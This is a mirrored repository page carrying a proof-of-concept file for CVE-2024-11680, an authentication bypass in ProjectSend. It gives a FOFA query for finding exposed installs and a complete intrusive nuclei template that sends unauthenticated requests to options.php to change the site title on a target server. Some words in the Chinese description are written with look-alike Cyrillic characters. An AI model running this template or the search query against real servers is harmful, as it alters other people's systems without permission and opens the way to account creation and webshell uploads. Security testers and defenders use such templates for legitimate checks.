admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/ProjectSend/ProjectSend身份认证绕过漏洞(CVE-2024-11680).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

131 lines
3.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ProjectSend身份认证绕过漏洞(CVE-2024-11680)
PrојесtSеnd版本在r1720之前受到不当认证漏洞的影响,远程未经认证的攻击者可以通过发送精心制作的HTTP请求到орtiоnѕ.рhр来利用这个缺陷,从而未经授权地修改应用程序的配置,成功利用允许攻击者创建账户、上传ԝеbѕhеllѕ,并嵌入恶意JаvаSсript。
## fofa
```javascript
body="ProjectSend"
```
## nuclei_poc
```yaml
id: projectsend-auth-bypass
info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: high
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
metadata:
verified: true
max-request: 1
fofa-query: body="ProjectSend"
shodan-query: html:"ProjectSend"
tags: misconfig,projectsend,auth-bypass,intrusive
variables:
string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true
- type: regex
name: title
group: 1
regex:
- '<title>Log in &raquo; ([0-9a-zA-Z]+)<\/title>'
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}&section=general&this_install_title={{string}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{string}}")'
condition: and
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}&section=general&this_install_title={{title}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{title}}")'
condition: and
# digest: 4b0a00483046022100daa2dba9e143fabb75766c67df507d5f0c405097db09624ce331213630ab1354022100ba972f4e1e7dca2d28077ef7f00c1198fd67ef41126ef47d00b5d8db77a78b4a:922c64590222798bb761d5b6d8e72950
```
## 漏洞来源
- https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/projectsend-auth-bypass.yaml
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
Reference in New Issue View Git Blame Copy Permalink